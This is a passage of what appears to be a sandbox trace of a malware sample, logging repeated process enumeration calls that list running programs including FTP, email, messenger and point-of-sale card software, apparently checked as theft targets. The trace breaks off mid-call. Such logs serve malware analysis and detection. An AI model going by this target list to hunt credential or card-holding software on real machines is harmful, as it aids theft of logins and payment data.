th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0172.698] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0172.701] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0172.703] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0172.748] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0172.750] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0172.753] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0172.755] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0172.757] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0172.759] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0172.762] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0172.764] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0172.766] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0172.768] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0172.770] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0172.772] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0172.774] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0172.780] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0172.782] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0172.787] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0172.789] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0172.792] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0172.796] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0172.799] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0172.802] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0172.804] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0172.807] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0172.811] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0172.814] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0172.816] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0172.819] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0172.822] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0172.830] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0172.833] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0172.835] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0172.838] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0172.841] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0172.844] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0172.846] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0172.849] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0172.851] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0172.854] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0172.856] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0172.859] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0172.861] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0172.866] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0172.869] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0172.871] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0172.873] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0172.876] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0172.880] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0172.882] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0172.884] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0172.887] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0172.889] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0172.891] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0172.894] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0172.896] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0172.899] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0172.901] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0172.906] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0172.908] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0172.911] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0172.913] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0172.916] Process32Next (in: hSnapshot=0x1cd8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0172.919] CloseHandle (hObject=0x1cd8) returned 1 [0172.919] Sleep (dwMilliseconds=0x64) [0173.025] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb2c [0173.039] Process32First (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.041] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.043] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.044] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.046] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.048] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.050] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.055] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.057] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.060] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.063] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.109] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.110] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.112] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.114] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.116] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.118] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.120] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.122] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.124] Process32Next (in: hSnapshot=0xb2c, lppe=0x102efe20 | out: 